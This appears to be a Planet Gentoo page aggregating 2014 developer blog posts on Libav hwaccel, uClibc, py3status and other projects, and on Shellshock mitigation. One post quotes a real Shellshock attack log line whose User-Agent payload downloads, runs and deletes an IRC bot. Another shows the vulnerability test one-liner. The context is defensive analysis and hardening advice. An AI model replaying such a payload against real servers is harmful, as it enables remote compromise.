Last year, since the backends I wanted to support were all bitstream-oriented and did not fit the model at all, I started thinking about it, and the topic got discussed a bit during VDD 13. Some people who had spent their dear time getting hwaccel1 working with their software were quite wary of radical changes, so a path of incremental improvements got more or less put down.

HWAccel 1.2

  • default functions to allocate and free the backend context and make the struct to interface between Libav and the backend extensible without causing breakage.
  • avconv now can use some hwaccels, providing at least an example of how to use them and a means to test without having to gut VLC or mpv to experiment.
  • document better the old-style hwaccels, so at least some mistakes can be avoided (and some code that happens to work by sheer luck won’t break once the faulty assumptions cease to exist).

The new VDA backend and the updated VDPAU backend are examples of it.
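As a rough sketch of what using one of these hwaccels from avconv looks like (the exact option names and backend availability depend on the build, so treat this as an assumption to check against avconv's help output):

```shell
# Decode a file through the VDPAU hwaccel and discard the output,
# which is enough to verify that the hardware path works; the
# -hwaccel option name and the "vdpau" value are assumptions to
# verify against your avconv build.
avconv -hwaccel vdpau -i input.mkv -f null -
```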

HWAccel 1.3

  • extend the callback system to decently fit bitstream-oriented backends.
  • provide an example of backend directly providing normal AVFrames.

The Intel QSV backend is used as a testbed for hwaccel 1.3.

The future of HWAccel2

Another year, another meeting. We sat down again to figure out how to get closer to the end result of not having casual users write boilerplate code to use hwaccel for at least some performance boost, and yet let power users have full access to the underpinnings so they can get the most out of it without having to write everything from scratch.

Simplified usage, hopefully really simple

The user just needs to use AVOption to set specific keys such as hwaccel and optionally hwaccel-device, and the library will take care of everything. The frames returned by avcodec_decode_video2 will reside in normal system memory and use commonly used pixel formats. No further special code will be needed.

Advanced usage, now properly abstracted

All the default initialization, memory/surface allocation and such will remain overridable, with the difference that an additional callback called get_hw_surface will be introduced to completely separate the hwaccel path from the software path, and specific functions to hand over the ownership of backend contexts and surfaces will be provided.

The software fallback won’t be automagic anymore in this case; instead a specific AVERROR_INPUT_CHANGED will be returned, so it will be cleaner for the user to reset the decoder without losing the display that may be sharing the same context. This leads the way to a simpler means of supporting multiple hwaccel backends and falling back from one to the other, and eventually to software decoding.

Migration path

We try our best to help people move to the new APIs.

Moving from HWAccel1 to HWAccel2 would in general result in fewer lines of code in the application; people wanting to keep their callbacks need just to set them after avcodec_open2 and move the pixel-specific get_buffer to get_hw_surface. The presence of av_hwaccel_hand_over_frame and av_hwaccel_hand_over_context will make managing the backend-specific resources much simpler.

Expected Time of Arrival

Right now HWAccel 1.3 is under review; I hope to complete this step and add a few new backends to test how good or bad that API is before adding the other steps. HWAccel2 will probably take at least another 6 months.

Help, in the form of code or just moral support, is always welcome!

Mike Pagano a.k.a. mpagano (homepage, bugs)
Netflix on Gentoo (October 11, 2014, 13:11 UTC)

Contrary to some articles you may read on the internet, Netflix is working great on Gentoo.

Here’s a snapshot of my system running 3.12.30-gentoo sources and Google Chrome version 39.0.2171.19_p1.



$ equery l google-chrome-beta
* Searching for google-chrome-beta …
[IP-] [ ] www-client/google-chrome-beta-39.0.2171.19_p1:0



October 08, 2014
Alexys Jacob a.k.a. ultrabug (homepage, bugs)
py3status v1.6 (October 08, 2014, 09:01 UTC)

Back from holidays, this new version of py3status was due for a long time now, as it features a lot of great contributions!

This version is dedicated to the amazing @ShadowPrince who contributed 6 new modules :)


  • core : rename the ‘examples’ folder to ‘modules’
  • core : Fix include_paths default wrt issue #38, by Frank Haun
  • new vnstat module, by Vasiliy Horbachenko
  • new net_rate module, alternative module for tracking network rate, by Vasiliy Horbachenko
  • new scratchpad-counter module and window-title module for displaying the current window’s title, by Vasiliy Horbachenko
  • new keyboard-layout module, by Vasiliy Horbachenko
  • new mpd_status module, by Vasiliy Horbachenko
  • new clementine module displaying the current “artist – title” playing in Clementine, by François LASSERRE
  • module Make python3 compatible, by Frank Haun
  • add optional CPU temperature to the sysdata module, by Rayeshman
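For context, py3status drops in as a replacement for i3status in the i3 bar; a minimal configuration sketch (both paths are illustrative assumptions):

```shell
# i3 config fragment (~/.i3/config): let py3status wrap the existing
# i3status configuration; the -c path is illustrative.
bar {
    status_command py3status -c ~/.i3/i3status.conf
}
```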


Huge thanks to this release’s contributors:

  • @ChoiZ
  • @fhaun
  • @rayeshman
  • @ShadowPrince

What’s next?

The next 1.7 release of py3status will bring a neat and cool feature which I’m sure you’ll love. Stay tuned!

October 07, 2014
Sebastian Pipping a.k.a. sping (homepage, bugs)
Two types of respect mixed up by Linus Torvalds (October 07, 2014, 19:59 UTC)

I recently ran into the Q&A with Linus Torvalds @ Debconf 2014 video.

During the session, Torvalds is being criticized for lack of respect and replies that ~”respect is to be earned”. Technically, he confuses respect as in admiration with respect as in dignity. Simplified, he is saying that human dignity does not matter to him. Linus, I’m fairly disappointed.

October 06, 2014
Hanno Böck a.k.a. hanno (homepage, bugs)
How to stop Bleeding Hearts and Shocking Shells (October 06, 2014, 21:35 UTC)

The free software community was recently shattered by two security bugs called Heartbleed and Shellshock. While technically these bugs were quite different, I think they still share a lot.

Heartbleed hit the news in April this year: a bug in OpenSSL that allowed attackers to extract private keys of encrypted connections. When a bug in Bash called Shellshock hit the news, I was at first hesitant to call it bigger than Heartbleed. But now I am pretty sure it is. While Heartbleed was big, there were some things that alleviated the impact. It took some days till people found out how to practically extract private keys - and it still wasn't fast. And the most likely attack scenario - stealing a private key and pulling off a man-in-the-middle attack - seemed something that'd still pose some difficulties to an attacker. It seemed that people who update their systems quickly (like me) weren't in any real danger.

Shellshock was different. It's astonishingly simple to use and real attacks started hours after it became public. If circumstances had been unfortunate there would've been a very real chance that my own servers could've been hit by it. I usually feel the IT stuff under my responsibility is pretty safe, so things like this scare me.

What OpenSSL and Bash have in common

Shortly after Heartbleed something became very obvious: the OpenSSL project wasn't in good shape. The software that pretty much everyone on the Internet uses to do encryption was run by a small number of underpaid people. People trying to contribute and submit patches were often ignored (I know that, I tried it). The truth about Bash looks even grimmer: it's a project mostly run by a single volunteer. And yet almost every large Internet company out there uses it. Apple installs it on every laptop. OpenSSL and Bash are crucial pieces of software and run on the majority of the servers that run the Internet. Yet they are very small projects backed by few people. Besides, they are both quite old; you'll find tons of legacy code in them, written more than a decade ago.

People like to rant about the code quality of software like OpenSSL and Bash. However, I am not that concerned about these two projects. This is the upside of events like these: OpenSSL is probably much more secure than it ever was, and after the dust settles Bash will be a better piece of software. If you want to ask yourself where the next Heartbleed/Shellshock-like bug will happen, ask this: what projects are there that are installed on almost every Linux system out there? And how many of them have a healthy community and received a good security audit lately?

Software installed on almost any Linux system

Let me propose a little experiment: take your favorite Linux distribution, make a minimal installation without anything and look at what's installed. These are the software projects you should worry about. To make things easier I did this for you. I took my own system of choice, Gentoo Linux, but the results wouldn't be very different on other distributions. The results are at the bottom of this text. (I removed everything Gentoo-specific.) I admit this is oversimplifying things. Some of these provide more attack surface than others; we should probably worry more about the ones that are directly involved in providing network services.
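On Gentoo the experiment can be approximated without a fresh install; a hedged sketch using standard emerge flags:

```shell
# Print every package a minimal Gentoo system would contain, without
# installing anything: --emptytree recomputes the full @system set,
# --pretend only lists it.
emerge --pretend --emptytree @system
```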

After Heartbleed some people already asked questions like these. How could it happen that a project so essential to IT security is so underfunded? Some large companies acted and the result is the Core Infrastructure Initiative by the Linux Foundation, which already helped improving OpenSSL development. This is a great start and an example for an initiative of which we should have more. We should ask the large IT companies who are not part of that initiative what they are doing to improve overall Internet security.

Just to put this into perspective: A thorough security audit of a project like Bash would probably require a five figure number of dollars. For a small, volunteer driven project this is huge. For a company like Apple - the one that installed Bash on all their laptops - it's nearly nothing.

There's another recent development I find noteworthy. Google started Project Zero where they hired some of the brightest minds in IT security and gave them a single job: Search for security bugs. Not in Google's own software. In every piece of software out there. This is not merely an altruistic project. It makes sense for Google. They want the web to be a safer place - because the web is where they earn their money. I like that approach a lot and I have only one question to ask about it: Why doesn't every large IT company have a Project Zero?

Sparking interest

There's another aspect I want to talk about. After Heartbleed people started having a closer look at OpenSSL and found a number of small and one other quite severe issue. After Bash people instantly found more issues in the function parser and we now have six CVEs for Shellshock and friends. When a piece of software is affected by a severe security bug people start to look for more. I wonder what it'd take to have people looking at the projects that aren't in the spotlight.

I was brainstorming if we could have something like a "free software audit action day". A regular call where an important but neglected project is chosen and the security community is asked to have a look at it. This is just a vague idea for now, if you like it please leave a comment.

That's it. I refrain from having discussions whether bugs like Heartbleed or Shellshock disprove the "many eyes"-principle that free software advocates like to cite, because I think these discussions are a pointless waste of time. I'd like to discuss how to improve things. Let's start.

Here's the promised list of Gentoo packages in the standard installation:


October 04, 2014
Anthony Basile a.k.a. blueness (homepage, bugs)

It has been four months since my last major build and release of Lilblue Linux, a pet project of mine [1]. The name is a bit pretentious, I admit, since Lilblue is not some other Linux distro. It is Gentoo, but Gentoo with a twist. It's a fully featured amd64, hardened, XFCE4 desktop that uses uClibc instead of glibc as its standard C library. I use it on some of my workstations at the College and at home, like any other desktop, and I know other people that use it too, but the main reason for its existence is that I wanted to push uClibc to its limits and see where things break. Back in 2011, I got bored of working with the usual set of embedded packages. So, while my students were writing their exams in Modern OS, I entertained myself just adding more and more packages to a stage3-amd64-hardened system [2] until I had a decent desktop. After playing with it on and off, I finally polished it to the point where I thought others might enjoy it too, and started pushing out releases. Recently, I found out that the folks behind uselessd [3] used Lilblue as their testing ground. uselessd is another response to systemd [4], something like eudev [5], which I maintain, so the irony here is too much not to mention! But that's another story …

There was only one interesting issue about this release.  Generally I try to keep all releases about the same.  I’m not constantly updating the list of packages in @world.  I did remove pulseaudio this time around because it never did work right and I don’t use it.  I’ll fix it in the future, but not yet!  Instead, I concentrated on a much more interesting problem with a new release of e2fsprogs [6].   The problem started when upstream’s commit 58229aaf removed a broken fallback syscall for fallocate64() on systems where the latter is unavailable [7].  There was nothing wrong with this commit, in fact, it was the correct thing to do.  e4defrag.c used to have the following code:

#ifndef HAVE_FALLOCATE
#warning Using locally defined fallocate syscall interface.

#ifndef __NR_fallocate
#error Your kernel headers dont define __NR_fallocate
#endif

/*
 * fallocate64() - Manipulate file space.
 *
 * @fd: defrag target file's descriptor.
 * @mode: process flag.
 * @offset: file offset.
 * @len: file size.
 */
static int fallocate64(int fd, int mode, loff_t offset, loff_t len)
{
	return syscall(__NR_fallocate, fd, mode, offset, len);
}
#endif /* ! HAVE_FALLOCATE */

The idea was that, if a configure test for fallocate64() failed because it isn’t available in your libc, but there is a system call for it in the kernel, then e4defrag would just make the syscall via your libc’s indirect syscall() function. Seems simple enough, except that how system calls are dispatched is architecture- and ABI-dependent, and the above is broken on 32-bit systems [8]. Of course, uClibc didn’t have fallocate(), so e4defrag failed to build after that commit. To my surprise, musl does have fallocate(), so this wasn’t a problem there, even though it is a Linux-specific function and not in any standard.

My first approach was to patch e2fsprogs to use posix_fallocate(), which is supposed to be equivalent to fallocate() when invoked with mode = 0. e4defrag calls fallocate() with mode = 0, so this seemed like a simple fix. However, this was not acceptable to Ts’o, since he was worried that some libc might implement posix_fallocate() by brute-force writing 0’s. That could be horribly slow for large allocations! This wasn’t the case for uClibc’s implementation, but that didn’t seem to make much difference upstream. Meh.

Rather than fight e2fsprogs, I sat down and hacked fallocate() into uClibc. Since both fallocate() and posix_fallocate(), and their LFS counterparts fallocate64() and posix_fallocate64(), make the same syscall, it was sufficient to isolate that in an internal function which both could make use of. That, plus a test suite, and Bernhard was kind enough to commit it to master [10]. Then a couple of backports, and uClibc’s 0.9.33 branch now has the fix as well. Because there hasn’t been a release of uClibc in about two years, I’m using the 0.9.33 branch HEAD for Lilblue, so the problem there was solved — I know it’s a little problematic, but it was either that or try to juggle dozens of patches.

The only thing that remains is to backport those fixes to the patchset vapier maintains for the uClibc ebuilds. Since my uClibc stage3’s don’t use the 0.9.33 branch HEAD, but the stable-tree ebuilds, which use the vanilla release plus Mike’s patchset, upgrading e2fsprogs is blocked for those stages.

This whole process may seem like a real pita, but this is exactly the sort of issue I like uncovering and cleaning up. So far, the feedback on the latest release is good. If you want to play with Lilblue and you don’t have a free box, fire up VirtualBox or your emulator of choice and give it a try. You can download it from the experimental/amd64/uclibc directory of any mirror [11].

October 03, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Does your webapp really need network access? (October 03, 2014, 23:01 UTC)

One of the interesting things I noticed after Shellshock was the number of probes for vulnerabilities that counted on webapp users having direct network access. Not only ping to known addresses just to verify the vulnerability, or wget or curl with unique IDs, but even very rough nc or /dev/tcp connections to give remote shells. The fact that probes are there makes it logical to me to expect that they actually worked on at least some systems.

The reason why this piqued my interest is that I realized most people don't take the one obvious step to mitigate this kind of problem: removing (or at least limiting) their web apps' access to the network. So I decided it might be worth describing for a moment why you should think about that. This is in part because I found out last year at LISA that not all sysadmins have enough training in development to immediately pick up how things work, and in part because I know that even if you're a programmer it might be counterintuitive to think that web apps should not have access, well, to the web.

Indeed, if you think of your app in the abstract, it has to have access to the network to serve responses to the users, right? But what generally happens is that you have some division between the web server and the app itself. People who looked into Java in the early noughties have probably heard the term Application Server, usually present in the form of Apache Tomcat or IBM WebSphere, but essentially the same "actor" exists for Rails apps in the form of Passenger, or for PHP with the php-fpm service. These "servers" are effectively self-contained environments for your app that talk with the web server to receive user requests and serve them responses. This essentially means that in the basic web interaction, no network access is needed by the application service.

Things get a bit more complicated in the Web 2.0 era though: OAuth2 requires your web app to talk, from the backend, with the authentication or data providers. Similarly, even my blog needs to talk with some services, either to ping them to tell them that a new post is out, or to check with Akismet for blog comments that might or might not be spam. WordPress plugins that create thumbnails are known to exist and to have a bad security history, and they fetch external content, such as videos from YouTube and Vimeo, or images from Flickr and other hosting websites, to process. So there is a good amount of network connectivity needed by web apps too. Which means that rather than just isolating apps from the network, what you need to implement is some sort of filter.

Now, there are plenty of ways to remove network access from your webapp: SELinux, grsecurity RBAC, AppArmor, … but if you don't want to set up a complex security system, you can do the trick even with the bare minimum of the Linux kernel, iptables and CONFIG_NETFILTER_XT_MATCH_OWNER. Essentially what this allows you to do is to match (and thus filter) connections based on the originating (or destination) user. This of course only works if you can isolate your webapps under separate users, which is definitely what you should do, but not necessarily what people are doing. Especially with things like mod_perl or mod_php, separating webapps into users is difficult – they run in-process with the webserver, and negate the split with the application server – but at least php-fpm and Passenger allow for that quite easily. Running as separate users, by the way, has many more advantages than just network filtering, so start doing that now, no matter what.

Now depending on what webapp you have in front of you, there are different ways to achieve a near-perfect setup. In my case I have a few different applications running across my servers: my blog, a WordPress blog of a customer, phpMyAdmin for that customer's database, and finally a webapp for an old customer which is essentially an ERP. These have different requirements, so I'll start from the one with the lowest.

The ERP app was designed to be as simple as possible: it's a basic Rails app that uses PostgreSQL to store data. The authentication is done by Apache via HTTP Basic Auth over HTTPS (no plaintext), so there is no OAuth2 or other backend interaction. The only expected connection is to the PostgreSQL server. The requirements for phpMyAdmin are pretty similar: it only has to interface with Apache and with the MySQL service it administers, and the authentication is also done on the HTTP side (also encrypted). For both these apps, the network policy is quite obvious: deny any outside connectivity. This becomes a matter of iptables -A OUTPUT -o eth0 -m owner --uid-owner phpmyadmin -j REJECT — and the same for the other user.
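As a minimal sketch of such a lockdown — assuming a hypothetical `erp` user and an interface named eth0; adjust names, interface and addresses to your own setup (the kernel needs CONFIG_NETFILTER_XT_MATCH_OWNER, and the commands run as root):

```shell
# If PostgreSQL runs on the same host, rejecting everything the
# hypothetical "erp" user sends out eth0 is enough, since loopback
# traffic never touches that interface:
iptables -A OUTPUT -o eth0 -m owner --uid-owner erp -j REJECT

# If instead the database lives on another host, allow that single
# destination first (192.0.2.10 is a placeholder address):
iptables -A OUTPUT -o eth0 -p tcp -d 192.0.2.10 --dport 5432 \
         -m owner --uid-owner erp -j ACCEPT
iptables -A OUTPUT -o eth0 -m owner --uid-owner erp -j REJECT
```

Because the owner match only works on locally generated packets, these rules go in the OUTPUT chain; FORWARD and PREROUTING have no owning process to match against.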

The situation for the other two apps is a bit more complex: my blog wants to at least announce that there are new blog posts, and it needs to reach Akismet; both actions use HTTP and HTTPS. WordPress is a bit more complex because I don't have much control over it (it has a dedicated server, so I don't have to care), but I assume it mostly uses HTTP and HTTPS as well. The obvious idea would be to allow ports 80, 443 and 53 (for name resolution). But you can do something better: you can put a proxy on localhost and force the webapp to go through it, either as a transparent proxy or by using the http_proxy environment variable to convince the webapp to never connect directly to the web. Unfortunately that is not straightforward to implement, as neither Passenger nor php-fpm has a clean way to pass environment variables per user.
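The transparent-proxy variant can be sketched with the same owner match plus a NAT redirect. This assumes a hypothetical `blog` user and a local proxy (squid, tinyproxy, or similar) listening on 127.0.0.1:8118 — all names and ports here are placeholders, and HTTPS would need a CONNECT-aware proxy and equivalent handling for port 443:

```shell
# Rewrite the "blog" user's outbound HTTP to the local proxy; this
# happens in the nat OUTPUT chain, before the filter rules below.
iptables -t nat -A OUTPUT -p tcp --dport 80 \
         -m owner --uid-owner blog -j REDIRECT --to-ports 8118

# Leave DNS resolution working, then drop everything else that the
# "blog" user tries to send out directly.
iptables -A OUTPUT -o eth0 -p udp --dport 53 \
         -m owner --uid-owner blog -j ACCEPT
iptables -A OUTPUT -o eth0 -m owner --uid-owner blog -j REJECT
```

The net effect is that the webapp can only reach the web through the proxy, where you can then log and filter destinations centrally.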

What I've done for now is hack the environment.rb file to set ENV['http_proxy'] = '' so that Ruby will at least respect it. I'm still looking for a solution for PHP, unfortunately. In the case of Typo, this actually showed me two things I did not know: when looking at the admin dashboard, it makes two main HTTP calls: one to Google Blog Search – which was shut down back in May – and one to Typo's version file — which is now a 404 page since the move to the Publify name. I'll soon be shutting down both calls since I really don't need them. Indeed, Publify development still seems to head toward "let's add all possible new features that other blogging sites have" without considering the actual scalability of the platform. I don't expect to go back to it any time soon.

Anthony Basile a.k.a. blueness (homepage, bugs)

Two years ago, I took on the maintenance of thttpd, a web server written by Jef Poskanzer at ACME Labs [1].  The code hadn’t been updated in about 10 years and there were dozens of accumulated patches in the Gentoo tree, many of which addressed serious security issues.  I emailed upstream and was told the project was “done”, whatever that meant, so I was going to tree-clean it.  When I expressed my intentions on the upstream mailing list, I got a bunch of “please don’t!” from users.  So rather than maintain a ton of patches, I forked the code, rewrote the build system to use autotools, and applied all the patches.  I dubbed the fork sthttpd.  There was no particular meaning to the “s”.  Maybe “still kicking”?

I put a git repo up on my server [2], got a mailing list going [3], and set up bugzilla [4].  There hasn’t been much activity, but there was enough: the project got noticed by someone who pushed it out to OpenBSD ports [5].

Today, I finally pushed out 2.27.0 after two years.  This release takes care of a couple of new security issues: I fixed the world-readable log problem, CVE-2013-0348 [6], and Vitezslav Cizek <>  from OpenSUSE fixed a possible DoS triggered by a specially crafted .htpasswd file. Bob Tennent added some code to send correct headers for .svgz content, and Jean-Philippe Ouellet did some code cleanup.  So it was time.

Web servers are not my style, but its tiny size and speed make it perfect for embedded systems, which are near and dear to my heart.  I also make sure it compiles on *BSD and on Linux with glibc, uClibc or musl.  Not bad for a codebase that is over 10 years old!  Kudos to Jef.

Hanno Böck a.k.a. hanno (homepage, bugs)
New laptop Lenovo Thinkpad X1 Carbon 20A7 (October 03, 2014, 21:05 UTC)

While I got along well with my Thinkpad T61 laptop, for quite some time I had planned to get a new one. It wasn't an easy decision and I looked at the available models in detail over recent months. I finally decided to buy one of Lenovo's Thinkpad X1 Carbon laptops in its 2014 edition. The X1 Carbon was introduced in 2012; however, a completely new variant, very different from the first one, was released in early 2014. To distinguish it from other models it is the 20A7 model.

Judging from the first days of use I think I made the right decision. I hadn't seen the device before I bought it because it seems shops rarely keep this device in stock. I assume this is due to the relatively high price.

I was a bit worried because Lenovo made some unusual decisions for the keyboard; however, having used it for a few days, I don't feel that it has any severe downsides. The most unusual thing about it is that it doesn't have normal F1-F12 keys; instead it has what Lenovo calls an adaptive keyboard: a touch-sensitive strip which can display different kinds of keys. The idea is that different applications can have their own set of special keys there. However, just letting it display the normal F-keys works well, and not having "real" keys there doesn't feel like a big disadvantage. Besides that, Lenovo removed the Caps Lock key and placed Pos1/End there, which is a bit unusual but also nothing I worried about. I also hadn't seen any pictures of the German keyboard before I bought the device. The ^/° key is not where it used to be (small downside), but the </>/| key is where it belongs (big plus, many laptop vendors get that wrong).

Good things:
* Lightweight, Ultrabook, no unnecessary stuff like CD/DVD drive
* High resolution (2560x1440)
* Hardware is up-to-date (Haswell chipset)

Not so good things:
* Due to the ultrabook / integrated design, no easy changing of battery, RAM or HD
* No SD card reader
* Some trouble getting used to the touchpad (however there are lots of ways to configure it; I assume it'll get better as I play with it)

It used to be the case that people wrote docs on how to get all the hardware in a laptop running on Linux, which I did for my previous laptops. These days this usually boils down to "run a recent Linux distribution with the latest kernel and xorg packages and most things will be fine". However, I thought having a central place where I collect relevant information would be nice, so I created one again. As usual I'm running Gentoo Linux.

For people who plan to run Linux without a dual boot it may be worth mentioning that there seem to be troublesome errors in earlier versions of the BIOS and the SSD firmware. You may want to update them before removing Windows. On my device they were already up-to-date.

September 30, 2014
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
A little positivity goes a long way (September 30, 2014, 02:59 UTC)

Today was an interesting one that I probably won’t forget for a while. Sure, I will likely forget all the details, but the point of the day will remain in my head for a long time to come. Why? Simply put, it made me think about the power of positivity (which is not generally a topic that consumes much of my thought cycles).

I started out the day in the same way that I start out almost every other day—with a run. I had decided that I was going to go for a 15 km run instead of the typical 10 or 12, but that’s really irrelevant. Within the first few minutes, I passed an older woman (probably in her mid-to-late sixties), and I said “good morning.” She responded with “what a beautiful smile! You make sure to give that gift to everyone today.” I was really taken aback by her comment because it was rather uncommon in this day and age.

Her comment stuck with me for the rest of the run, and I thought about the power that it had. It cost her absolutely nothing to say those refreshing, kind words, and yet, the impact was huge! Not only did it make me feel good, but it had other positive qualities as well. It made me more consciously consider my interactions with so-called “strangers.” I can’t control any aspect of their lives, and I wouldn’t want to do so. However, a simple wave to them, or a “good morning” may make them feel a little more interconnected with humanity.

Not all that long after, I went to get a cup of coffee from a corner shop. The clerk asked if that would be all, and I said it was. He said “Have a good day.” I didn’t have to pay for it because apparently it was National Coffee Day. Interesting. The more interesting part, though, was when I was leaving the store. I held the door for a man, and he said “You, sir, are a gentleman and a scholar,” to which I responded “well, at least one of those.” He said “aren’t you going to tell me which one?” I said “nope, that takes the fun out of it.”

That brief interaction wasn’t anything special at all… or was it? Again, it embodied the interconnectedness of humanity. We didn’t know each other at all, but yet we were able to carry on a short conversation, understand one another’s humour, and, in our own ways, thank each other. He thanked me for a small gesture of politeness, and I thanked him for acknowledging it. All too often those types of gestures go without as much as a “thank you.” All too often, these types of gestures get neglected and never even happen.

What’s my point here? Positivity is infectious and in a great way! Whenever you’re thinking that the things you do and say don’t matter, think again. Just treating the people with whom you come in contact many, many times each day with a little respect can positively change the course of their day. A smile, saying hello, casually asking them how they’re doing, holding a door, helping someone pick up something that they’ve dropped, or any other positive interaction should be pursued (even if it is a little inconvenient for you). Don’t underestimate the power of positivity, and you may just help someone feel better. What’s more important than that? That’s not a rhetorical question; the answer is “nothing.”


September 28, 2014
Hanno Böck a.k.a. hanno (homepage, bugs)
Responsibility in running Internet infrastructure (September 28, 2014, 23:31 UTC)

If you have any interest in IT security you have probably heard of a vulnerability in the command line shell Bash, now called Shellshock. Whenever serious vulnerabilities are found in such a widely used piece of software, it's inevitable that this will have some impact. Machines get owned and abused to send spam, DDoS other people or spread malware. However, I feel a lot of the scale of the impact is due to the fact that far too many people run Internet infrastructure in an irresponsible way.

After Shellshock hit the news it didn't take long for the first malicious attacks to appear in people's webserver logs - beside some scans done by researchers. On Saturday I had a look at a few such log entries, from my own servers and from what other people posted on some forums. This was one of them: - - [26/Sep/2014:17:19:07 +0200] "GET /cgi-bin/hello HTTP/1.0" 404 12241 "-" "() { :;}; /bin/bash -c \"cd /var/tmp;wget;curl -O /var/tmp/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""

Note the time: this was on Friday afternoon, 5 pm (CET timezone). What's happening here is that someone is sending an HTTP request where the user agent string – which usually contains the name of the software (e.g. the browser) – is set to malicious code meant to exploit the Bash vulnerability. If successful it would download a malware script called jurat and execute it. We had obviously already upgraded our Bash installation, so this didn't do anything on our servers. The file jurat contains a perl script which is a malware called IRCbot.a or Shellbot.B.
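The mechanics are easy to check locally with the widely circulated test one-liner: a function definition is placed in an environment variable, and a vulnerable bash executes the trailing commands while importing that variable.

```shell
# A patched bash prints only "test"; a vulnerable one prints
# "vulnerable" first, because it runs the code that follows the
# function body in the variable x while starting up.
result=$(env x='() { :;}; echo vulnerable' bash -c 'echo test' 2>/dev/null)
echo "$result"
```

The attack in the log above works the same way, except the "variable" is the HTTP User-Agent header, which the web server exports into the environment of a CGI script before bash is invoked.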

For all such logs I checked whether the downloads were still available. Most of them were offline; however, the one presented here was still there. I checked the IP: it belongs to a Dutch company called AltusHost. Most likely one of their servers got hacked and someone placed the malware there.

I tried to contact AltusHost in different ways. I tweeted at them. I tried their live support chat, where I could talk with somebody who asked me if I was a customer. He told me that if I wanted to report abuse he couldn't help me; I should write an email to their abuse department. I asked him if he couldn't just tell them. He said that was not possible. So I wrote an email to their abuse department. Nothing happened.

On Sunday at noon the malware was still online. When I checked again late on Sunday evening it was gone.

Don't get me wrong: Things like this happen. I run servers myself. You cannot protect your infrastructure from any imaginable threat. You can greatly reduce the risk and we try a lot to do that, but there are things you can't prevent. Your customers will do things that are out of your control and sometimes security issues arise faster than you can patch them. However, what you can and absolutely must do is having a reasonable crisis management.

When one of the servers in your responsibility is part of a large-scale attack based on a threat that's making headlines everywhere, I can't even imagine what it takes not to notice for almost two days. I don't believe I was the only one trying to get their attention. The speed at which you take action in such a situation is the difference between hundreds and millions of infected hosts. Having your hosts deploy malware that long is the kind of thing that makes the Internet a less secure place for everyone. Companies like AltusHost are helping malware authors. Not directly, but through their inaction.

Sebastian Pipping a.k.a. sping (homepage, bugs)
Unblocking F-keys (e.g. F9 for htop) in Guake 0.5.0 (September 28, 2014, 18:36 UTC)

I noticed that I couldn’t kill a process in htop today: F9 did not seem to be working; actually, most of the F-keys did not.

The reason turned out to be that Guake 0.5.0 takes over keys F1 to F10 for direct access to tabs 1 to 10.
That may work for most terminal applications, but for htop it’s a killer.

So how can I prevent Guake from taking F9 over?
The preferences dialog allows me to assign a different key, but not no key at all. Really? There is no context menu, and backspace and delete didn’t help. For now I assume it’s not possible.
So I fired up gconf-editor, menu > Edit > Find… > “guake” — there it is. However, upon “Edit key…”, gconf-editor says to me:

Currently pairs and schemas can’t be edited. This will be changed in a later version.

Very nice.

In the end what did work was to run

gconftool-2 --set /schemas/apps/guake/keybindings/local/switch_tab9 \
	--type string ''

and to restart Guake.

I just opened a bug for this. If you like, you can follow it at .

Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
What does #shellshock mean for Gentoo? (September 28, 2014, 10:56 UTC)

Gentoo Penguins with chicks at Jougla Point, Antarctica
Photo credit: Liam Quinn

This is going to be interesting as Planet Gentoo is currently unavailable as I write this. I'll try to send this out further so that people know about it.

By now we have all been doing our best to update our laptops and servers to the new bash version so that we are safe from the big scare of the quarter, shellshock. I say laptop because the way the vulnerability can be exploited limits the impact considerably if you have a desktop or otherwise connect only to trusted networks.

What remains to be done is to figure out how to avoid a repeat of this. And that's a difficult topic, because a 25-year-old bug is not easy to avoid, especially since there are probably plenty of siblings of it around that we have not found yet, just like this last week. But there are things that we can do as a whole environment to reduce the chances of problems like this either happening or at least escalating so quickly.

In this post I want to look into some things that Gentoo and its developers can do to make things better.

The first obvious thing is to figure out why /bin/sh for Gentoo is not dash or any other very limited shell such as BusyBox. The main answer lies in the init scripts that still use bashisms; this is not news, as I've pushed for that four years ago, while Roy insisted on it even before that. Interestingly enough, though, this excuse is getting less and less relevant thanks to systemd. This is indeed one of the things I find genuinely good in Lennart's design: we want declarative init systems, not imperative ones. Unfortunately, even systemd is not as declarative as it was originally supposed to be, so the init script problem is only half solved — on the other hand, it does make things much easier, as you have to start afresh anyway.

If either all your init scripts avoid bash, or you're using systemd (like me on the laptops), then it's mostly safe to switch to dash as the provider for /bin/sh:

# emerge eselect-sh
# eselect sh set dash

That will change your /bin/sh and make it much less likely that you'd be vulnerable to this particular problem. Unfortunately, as I said, it's only mostly safe. I found that some of the init scripts I wrote, even though I checked them with checkbashisms, did not work as intended with dash; fixes are on their way. I also found that the lsb_release command, while not requiring bash itself, uses non-POSIX features, resulting in garbage on the output — this breaks facter-2 but not facter-1, as I found out when it broke my Puppet setup.
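For illustration, here is one of the most common constructs that dash rejects outright, next to its POSIX spelling — a generic example, not necessarily one of the scripts in question:

```shell
# Bashism: pattern matching with [[ ]] and ==, which dash lacks:
#   if [[ $answer == y* ]]; then ...
# POSIX replacement: the case construct, which every sh implements.
answer="yes"
case "$answer" in
    y*) match="yes" ;;
    *)  match="no"  ;;
esac
echo "$match"
```

Arrays, `${var//pattern/replacement}` substitutions and `echo -e` are other frequent offenders; checkbashisms catches many of these, but as noted above it is not exhaustive.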

Interestingly it would be simpler for me to use zsh, as then both the init script and lsb_release would have worked. Unfortunately when I tried doing that, Emacs tramp-mode froze when trying to open files, both with sshx and sudo modes. The same was true for using BusyBox, so I decided to just install dash everywhere and use that.

Unfortunately it does not mean you'll be perfectly safe or that you can remove bash from your system. Especially in Gentoo, we have too many dependencies on it, the first being Portage of course, but eselect also qualifies. Of the two I'm actually more concerned about eselect: I have been saying this from the start, but designing such a major piece of software – that does not change that often – in bash sounds like insanity. I still think that is the case.

I think this is the main problem: in Gentoo especially, bash has always been considered a programming language. That's bad. Not only because it has only one reference implementation, but also because it seems to convince other people, new to coding, that it's good engineering practice. It is not. If you need to build something like eselect, you do it in Python, or Perl, or C, but not bash!

